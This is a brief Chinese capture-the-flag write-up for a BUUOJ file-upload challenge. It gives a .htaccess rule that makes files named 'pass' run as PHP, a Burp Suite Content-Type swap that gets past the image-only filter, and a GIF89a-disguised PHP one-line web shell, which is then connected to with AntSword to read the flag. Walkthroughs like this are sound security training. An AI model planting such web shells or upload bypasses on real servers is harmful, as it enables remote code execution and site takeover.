题目地址:https://buuoj.cn/challenges
解题思路,参考文章
第一步:进入题目,看到文件上传提示,猜想使用一句话木马获取shell
第二步:上传.htaccess并使用burpsuite改包
-
.htaccess介绍:原文
-
为什么要上传.htaccess?因为发现有上传拦截,只能上传图片,我们将一句话木马以png格式上传上去后利用.htaccess将指定文件名的图片文件以php格式进行解析,就可以使用了
-
.htaccess文件内容:将包含pass文件名的文件以php文件进行解析
<FilesMatch "pass">
SetHandler application/x-httpd-php
</FilesMatch>
- 上传后使用burpsuite改包,将Content-Type内容修改为:image/png
第三步:上传一句话木马
上传时使用burpsuite改包,将Content-Type内容修改为:image/png,并记住返回给的地址
一句话木马:
GIF89a? <script language="php">eval($_REQUEST[pass])</script>
第四步:获取flag
使用蚁剑对http://72ad7296-a219-4501-bb23-d5fa1bab9af4.node3.buuoj.cn/upload/0371a3fe4ff1667473cf863fe9cd172c/pass.png进行连接,在根目录下获取到flag
